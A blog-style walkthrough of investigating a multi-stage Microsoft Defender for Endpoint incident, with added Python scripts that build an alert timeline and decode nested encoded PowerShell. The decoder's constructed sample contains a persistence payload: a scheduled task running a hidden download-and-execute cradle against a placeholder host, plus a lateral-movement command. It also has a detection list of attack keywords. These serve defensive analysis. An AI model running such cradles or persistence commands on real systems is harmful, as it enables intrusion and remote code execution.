Investigating with Microsoft Defender for Endpoints (MDE)
Use a focused methodology to resolve multi-stage incidents quickly and effectively
Microsoft Defender for Endpoints (MDE) uses AI and analytics to correlate related alerts into a single incident, and it is not shy about showing every alert that could be involved. If a security analyst expands a multi-stage incident, they may see a long, multi-colored list of alerts of varying severity and complexity.
The amount of information the platform gives an analyst can seem overwhelming, but fear not. An analyst who understands how to use the MDE platform effectively can turn a multi-stage incident like this one into a manageable timeline.
In this blog, we show how an analyst can go over the multi-stage incident in the example image using the investigation phase of CyberMSI’s incident management approach. By using a focused methodology, a security analyst can turn an intimidating alert list into an accessible and clear timeline.
Get a Timeline of Events in the Incident Menu
The first menu an analyst sees when opening the incident is a sortable table of the alerts it contains. Sorting by time and reading across the columns gives an initial answer to the basic investigative questions: "who", "where", and "what happened".
Who: The "User" column shows the account (local or domain) in whose context the activity that raised each alert ran. If more than one account appears, note where in the timeline the switch happens; a change of account mid-incident is itself worth explaining.
Where: The "Device" column shows which endpoint each alert came from. In this example all of the alerts came from a single endpoint. If alerts span several devices, treat lateral movement as already underway rather than merely attempted.
What Happened: The "Title" column gives the alert name for each entry in the timeline. The titles are enough to sketch a basic timeline, but the analyst will need to open the individual alerts to learn what actually happened at each step.
Gather More Details from the Incident Menu
The incident menu holds other details the analyst should add to the timeline, namely the automation activity and the evidence collected.
Automation: The "Investigations" tab shows that the MDE automation system, Automated Investigation and Response (AIR), ran 3 times in response to these alerts. The analyst added each run to the timeline, together with its outcome, because a run that did not fully remediate marks a point where manual follow-up is still needed.
Evidence: The "Evidence" tab records every potentially malicious file and process found during the investigation. If the analyst needs more information about an item of evidence, they can collect it from the device with the investigation package feature in MDE.
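The steps above (sort the alert table by time, read off who, where and what, then fold in the AIR runs and the evidence) amount to building one merged timeline. The following script is an added example, not code from the original post or from CyberMSI; the alert, investigation and evidence records in it are constructed for illustration, and their field names are assumptions rather than the column names of any MDE export. It also goes slightly beyond the text by splitting the timeline into stages wherever there is a long quiet gap, and by flagging which AIR runs did not fully remediate.

```python
"""Merge an MDE incident's alerts, automated investigations and evidence into one timeline."""
from datetime import datetime, timedelta

# Constructed sample records shaped after the incident menu columns (Title, Severity,
# User, Device, time) plus the Investigations and Evidence tabs. Not real MDE output;
# the field names here are assumptions made for this example.
ALERTS = [
    {"id": "A3", "time": "2023-05-02T13:42:09Z", "severity": "Medium",
     "title": "Suspicious remote activity", "user": "svc-backup", "device": "ws-0042"},
    {"id": "A1", "time": "2023-05-02T13:05:12Z", "severity": "Low",
     "title": "Suspicious PowerShell command line", "user": "jdoe", "device": "ws-0042"},
    {"id": "A2", "time": "2023-05-02T13:07:44Z", "severity": "Medium",
     "title": "Scheduled task created by an unusual process", "user": "jdoe", "device": "ws-0042"},
]
INVESTIGATIONS = [
    {"id": 7001, "start": "2023-05-02T13:06:30Z", "trigger_alert": "A1", "state": "SuccessfullyRemediated"},
    {"id": 7002, "start": "2023-05-02T13:09:01Z", "trigger_alert": "A2", "state": "PartiallyRemediated"},
    {"id": 7003, "start": "2023-05-02T13:43:20Z", "trigger_alert": "A3", "state": "Benign"},
]
EVIDENCE = [
    {"type": "Process", "name": "powershell.exe", "verdict": "Suspicious", "alert": "A1"},
    {"type": "File", "name": "updater.ps1", "verdict": "Malicious", "alert": "A2"},
]


def ts(value: str) -> datetime:
    """Parse the ISO-8601 UTC timestamps used in the sample records."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def build_timeline(alerts, investigations, evidence):
    """Return alerts and AIR runs as one list of events sorted by time, with evidence attached."""
    events = []
    for a in alerts:
        events.append({"time": ts(a["time"]), "kind": "alert", "ref": a["id"],
                       "what": f"[{a['severity']}] {a['title']}", "who": a["user"], "where": a["device"]})
    for inv in investigations:
        trigger = next(a for a in alerts if a["id"] == inv["trigger_alert"])
        events.append({"time": ts(inv["start"]), "kind": "automation", "ref": f"AIR-{inv['id']}",
                       "what": f"Automated investigation {inv['state']} (alert {inv['trigger_alert']})",
                       "who": trigger["user"], "where": trigger["device"]})
    events.sort(key=lambda e: e["time"])
    # Attach each evidence item to the alert that surfaced it so the timeline shows what was found when.
    by_alert = {}
    for item in evidence:
        by_alert.setdefault(item["alert"], []).append(f"{item['type']} {item['name']} ({item['verdict']})")
    for e in events:
        e["evidence"] = by_alert.get(e["ref"], [])
    return events


def scope(alerts):
    """Answer 'who' and 'where': distinct accounts and devices, and whether it is a single endpoint."""
    users = sorted({a["user"] for a in alerts})
    devices = sorted({a["device"] for a in alerts})
    return {"users": users, "devices": devices, "single_endpoint": len(devices) == 1}


def stage_boundaries(events, gap=timedelta(minutes=15)):
    """Split the timeline into stages wherever consecutive events are more than `gap` apart."""
    stages, current = [], []
    for e in events:
        if current and e["time"] - current[-1]["time"] > gap:
            stages.append(current)
            current = []
        current.append(e)
    if current:
        stages.append(current)
    return stages


def not_fully_remediated(investigations):
    """AIR runs with any verdict other than SuccessfullyRemediated need a manual look."""
    return [inv["id"] for inv in investigations if inv["state"] != "SuccessfullyRemediated"]


def render(events):
    """One line per event, in the order an analyst would read the timeline."""
    return [f"{e['time']:%H:%M:%S} {e['kind']:<10} {e['where']} {e['who']:<11} {e['what']}"
            + (f"  evidence: {', '.join(e['evidence'])}" if e["evidence"] else "")
            for e in events]


if __name__ == "__main__":
    timeline = build_timeline(ALERTS, INVESTIGATIONS, EVIDENCE)
    print("\n".join(render(timeline)))
    print("scope:", scope(ALERTS))
    print("stages:", [len(s) for s in stage_boundaries(timeline)])
    print("AIR runs needing follow-up:", not_fully_remediated(INVESTIGATIONS))
```

The 15-minute stage gap is an arbitrary threshold; the point is that the quiet period between the scheduled-task alert and the later remote-activity alert is exactly where an analyst should ask what the attacker was doing that did not raise an alert.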
Investigating the Individual Alert Stories
The alert titles alone did not give the analyst a full picture of the incident, so they opened the alert menu for each alert they did not yet understand. The alert menu has a section called the "alert story" with more specific information about the alert. One of the alerts, for example, was an encoded PowerShell command; the alert story showed it decoded, along with a description of what the command did. It is still worth decoding such commands yourself when the displayed text is truncated or the decoded script contains another encoded layer.
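An encoded PowerShell command line is base64 of the script text in UTF-16LE, and attackers often nest a second base64 layer inside the first via `FromBase64String`. The decoder below is an added example, not code from the original post or from CyberMSI, and the sample command line it analyzes is constructed in the script itself. The indicator substrings for persistence and lateral movement are an assumed starter list, not anything MDE uses.

```python
"""Decode powershell.exe -EncodedCommand payloads, peel nested base64 layers, and flag indicators."""
import base64
import gzip
import re

# Assumed starter list of substrings that point at persistence, lateral movement or a download
# cradle in a decoded script. Extend it from your own detections; it is not an MDE rule set.
INDICATORS = {
    "persistence": ["register-scheduledtask", "schtasks", "currentversion\\run", "new-service",
                    "register-wmievent", "__eventfilter"],
    "lateral_movement": ["invoke-command", "-computername", "enter-pssession", "wmic /node",
                         "psexec", "invoke-wmimethod", "new-cimsession"],
    "download_cradle": ["downloadstring", "downloadfile", "invoke-webrequest", "net.webclient"],
}


def encode_command(script: str) -> str:
    """Build the value powershell.exe expects after -EncodedCommand: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def find_encoded_argument(cmdline: str):
    """Return the base64 blob following any unambiguous prefix of -EncodedCommand (-e, -enc, -EncodedCommand)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()  # powershell.exe accepts both -Enc and /Enc
        if tok[:1] in "-/" and name and "encodedcommand".startswith(name):
            return tokens[i + 1].strip("\"'")
    return None


def decode_blob(blob: str) -> str:
    """Base64-decode one layer. Handles missing padding, gzip, and UTF-16LE vs UTF-8 text."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    if raw[:2] == b"\x1f\x8b":  # gzip magic: IO.Compression.GzipStream style payload
        raw = gzip.decompress(raw)
    # UTF-16LE ASCII text has a NUL in every odd byte; use that to pick the right decoding.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_layers(blob: str, max_depth: int = 4):
    """Peel the outer -EncodedCommand layer, then every FromBase64String('...') literal found inside it."""
    layers, pending = [], [blob]
    while pending and len(layers) < max_depth:
        text = decode_blob(pending.pop(0))
        layers.append(text)
        pending.extend(re.findall(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", text, re.I))
    return layers


def classify(script: str):
    """Map each indicator category to the substrings actually present in the script."""
    low = script.lower()
    return {cat: [s for s in subs if s in low] for cat, subs in INDICATORS.items() if any(s in low for s in subs)}


def analyze_command_line(cmdline: str) -> dict:
    """Decode any encoded command in the command line and report indicators across all layers."""
    blob = find_encoded_argument(cmdline)
    if blob is None:
        return {"encoded": False, "layers": [], "indicators": classify(cmdline)}
    layers = decode_layers(blob)
    hits = {}
    for layer in layers:
        for cat, subs in classify(layer).items():
            hits[cat] = sorted(set(hits.get(cat, [])) | set(subs))
    return {"encoded": True, "layers": layers, "indicators": hits}


# Constructed sample: an outer script that registers a logon task and then runs a nested,
# separately encoded script that moves laterally. The host name and URL are placeholders.
INNER_SCRIPT = "Invoke-Command -ComputerName fs01 -ScriptBlock { whoami }"
OUTER_SCRIPT = (
    "$t = New-ScheduledTaskTrigger -AtLogOn; "
    "Register-ScheduledTask -TaskName 'Updater' -Trigger $t -Action (New-ScheduledTaskAction "
    "-Execute 'powershell.exe' -Argument '-w hidden -c IEX((New-Object Net.WebClient)"
    ".DownloadString(\"http://example.invalid/a\"))'); "
    f"IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('{encode_command(INNER_SCRIPT)}')))"
)
SAMPLE_CMDLINE = f"powershell.exe -NoP -W Hidden -Enc {encode_command(OUTER_SCRIPT)}"

if __name__ == "__main__":
    result = analyze_command_line(SAMPLE_CMDLINE)
    for depth, layer in enumerate(result["layers"]):
        print(f"layer {depth}: {layer}")
    print("indicators:", result["indicators"])
```

The UTF-16LE check matters in practice: a blob that was hand-built with `[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(...))` will decode to garbage if you assume PowerShell's native encoding, which is why the function inspects the bytes instead of trusting the flag.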
Once the analyst had gone through the alert stories, they had enough information to finish the investigation. They classified the incident as a medium severity true positive because the scripts run across the timeline were clear attempts to gain persistence and to move laterally.
Containment and Mitigation Actions
In this customer environment the analyst had been granted response permissions on the endpoints, so they could contain and mitigate the incident themselves. They contained it by isolating the device, which cuts the endpoint off from the network while leaving its connection to the Defender for Endpoint service intact, and then used the "live response" feature to remove the potentially malicious artifacts that the automation had been unable to clean up. Live response requires that the device is online and that the feature is enabled in the tenant, so confirm both before relying on it for mitigation.
We will continue to share best practices and lessons learned from using Microsoft Defender for Endpoints in customer environments in future posts. The EDR landscape will keep evolving, but the underlying methodology will remain useful for breaking down complex incidents during investigations.
In closing, consider these three questions when using the Microsoft Defender for Endpoints in your organization:
- Do we have an effective methodology for breaking down long multi-staged incidents?
- Are we using timelines to organize our incident investigations or are we “just winging it”?
- Would we be able to respond to a multi-stage incident like this one using the tools in MDE after the investigation is done?